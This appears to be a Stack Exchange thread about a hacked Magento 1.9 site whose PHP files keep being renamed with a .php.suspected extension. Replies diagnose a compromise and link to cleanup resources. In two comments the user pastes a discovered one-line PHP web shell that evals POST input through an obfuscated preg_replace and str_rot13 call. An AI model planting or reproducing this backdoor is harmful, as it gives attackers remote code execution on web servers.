# .php file auto converting to php.suspected

Tags: magento-1.9, php, filesystem

I am facing new problem within 2 days. My Many PHP file are showing extension as suspected. However, i renamed all as earlier , it again came as php.suspected within 8 hrs. Kindly Suggest me the solution.

- Earlier ;     model.php
- Now ;         model.php.suspected
  And same for many other files

Comment: Ransomeware getting ready to encrypt or a infection scanner marking suspect files to prevent use?

Comment: We just Want to it know , whether it is harmful for website ??

Comment: yes. your site has been hacked.... Please scan the systsem

Answer (score 0):

Unfortunately, your website and potentially your server have been hacked.

Even if it's not Magento related, you can use the following resources to help you fixing your problem:

- https://stackoverflow.com/questions/32835796/php-file-automatically-renamed-to-php-suspected
- https://community.magento.com/t5/Technical-Issues/File-Name-auto-renamed-suspected/td-p/17382
- https://wordpress.org/support/topic/link-templatephpsuspected
- https://stackoverflow.com/questions/31725357/php-file-changes-its-extention-to-suspeced

On top of that, you need to ensure you've applied all the security patches to your Magento store (you can use magereport.com to check the missing patches on your store)

Comment: I scan my website on magereport as well on google. Even i check google webmaster there is no sign of hacked. Buy there is 1 file where found conns.php.supscted - <?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>           Buy fact is that modified file name is not current. it is showing older date.

Comment: Magereport only checks for known magento vulnerabilities. Also any external tool that you use is only going to be able to check for problems from an external perspective. It can't see the contents of a php file for example. Unfortunately in your case it does sound like you have been hacked

Comment: This is conns.php.suspcted file ---- <?php ($www= $_POST['yt']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>  ............... Can u see any doubtfull

Answer (score 0):

I scan my website on magereport as well on google. Even i check google webmaster there is no sign of hacked. 
Buy there is 1 file where found
conns.php.supscted   - 
Buy fact is that modified file name is not current. it is showing older date.